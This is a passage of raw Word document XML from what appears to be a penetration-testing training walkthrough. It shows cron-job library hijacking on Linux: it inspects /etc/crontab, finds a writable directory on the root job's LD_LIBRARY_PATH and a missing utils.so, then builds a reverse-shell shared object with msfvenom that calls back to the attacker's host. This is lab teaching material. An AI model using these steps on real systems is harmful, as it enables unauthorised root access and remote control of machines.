      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a root-run entry that runs every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/sbin:/bin:/usr/sbin:/usr/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MAILTO=""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># For details see man 4 crontabs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Example of job definition:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># .---------------- minute (0 - 59)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  .------------- hour (0 - 23)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  .---------- day of month (1 - 31)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># *  *  *  *  * user-name  command to be executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  *  *  *  *  * root       /usr/bin/log-sweeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also note that this crontab file includes a custom </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_LIBRARY_PATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable which adds </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/utils</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the list of locations to search for library files. If we check these paths, we find that we only have write access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is perfect for our use since it appears first in the path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /usr/local/lib/dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">total 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxrwxrwx  2 root root  6 Sep  7 01:50 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 4 root root 30 Sep  7 01:50 ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /usr/local/lib/utils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">total 4.0K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 2 root root  22 Sep  7 01:46 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 4 root root  30 Sep  7 01:50 ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwxr-xr-x. 1 root root 476 Sep  7 01:47 utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The list of shared objects loaded by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/log-sweeper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">utils.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shared object which may be a good candidate for hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /usr/bin/log-sweeper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        linux-vdso.so.1 =&gt;  (0x00007ffd61a5c000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        utils.so =&gt; not found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        libc.so.6 =&gt; /lib64/libc.so.6 (0x00007f717136a000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        /lib64/ld-linux-x86-64.so.2 (0x00007f7171738000)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F2">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">log-sweeper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cron job, all we need to do is generate a malicious shared object file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">utils.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and place it in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. First, we'll generate our malicious shared object file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=kali LPORT=6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] No arch selected, selecting arch: x64 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size: 74 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Final size of elf-so file: 476 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Saved as: utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FC">
      <w:pPr>
